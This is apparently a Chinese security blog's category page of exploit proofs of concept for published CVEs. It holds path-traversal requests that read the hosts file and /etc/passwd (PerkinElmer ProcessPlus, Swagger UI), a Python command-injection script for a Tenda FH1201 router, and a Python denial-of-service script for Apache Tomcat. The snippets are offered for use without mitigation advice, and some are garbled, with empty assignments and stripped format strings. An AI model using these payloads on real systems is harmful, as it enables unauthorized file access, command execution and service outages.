分类 漏洞POC 下的文章 - 瓜皮博客_d0glun
首页
关于
搜 索
1
金蝶OA server_file 目录遍历漏洞
11 阅读
2
锐明Crocus系统存在任意用户添加漏洞
10 阅读
3
奥德美生物科技(中山)有限公司登陆系统文件包含漏洞
9 阅读
4
SPIP porte_plume插件 远程代码执行漏洞(CVE-2024-7954)
8 阅读
5
贝壳找房某处越权+Oracle盲注
7 阅读
默认分类
漏洞挖掘思路
漏洞POC
神兵利器
登录
/
注册
搜 索
Typecho
累计撰写
24
篇文章
累计收到
2
条评论
首页
栏目
默认分类
漏洞挖掘思路
漏洞POC
神兵利器
页面
关于
用户登录
登录
注册
找到
9
篇与
相关的结果
2025-05-20
PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)
PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)pocGET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1 Host: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Ldwk: YmllY2hhb2xlc2I= Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1
2025年05月20日
0 阅读
0 评论
0 点赞
2025-05-20
Swagger UI接口任意文件读取漏洞(CVE-2024-40348)
pochttp://IP//api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
2025年05月20日
2 阅读
0 评论
0 点赞
2025-05-20
Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)漏洞POCTenda FH1201 v1.2.0.14 存在命令注入漏洞,位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中,然后执行,因此攻击者可利用此漏洞执行任意命令固件下载网址:https://www.tendacn.com/download/detail-3322.htmlPOC import requests ip = '192.168.74.145' url = "http://" + ip + "/goform/WriteFacMac" payload = ";echo 'hacker!'" data = response = requests.post(url, data=data) print(response.text)
2025年05月20日
2 阅读
0 评论
0 点赞
2025-05-20
Apache Tomcat拒绝服务漏洞(CVE-2024-24549)
import http.client # Configuration host = "target-server" # Change this to the target server address port = 443 # Change this to the target server port (usually 443 for HTTPS) num_requests = 1000 # Number of requests to send def send_dos_requests(): try: # Create an HTTP/2 connection conn = http.client.HTTPSConnection(host, port, timeout=10) headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Test-Header": "A" * 65536 # Large header value to exceed limits } for i in range(num_requests): conn.request("POST", "/", headers=headers) response = conn.getresponse() print(f"Request : Status Code: ") conn.close() except Exception as e: print(f"[-] An error occurred: ") if __name__ == "__main__": print(f"Sending HTTP/2 requests to :") send_dos_requests() Apache Tomcat 11.0.0-M1 至 11.0.0-M16 Apache Tomcat 10.1.0-M1 至 10.1.18 Apache Tomcat 9.0.0-M1 至 9.0.85 Apache Tomcat 8.5.0 至 8.5.98
2025年05月20日
0 阅读
0 评论
0 点赞
1
2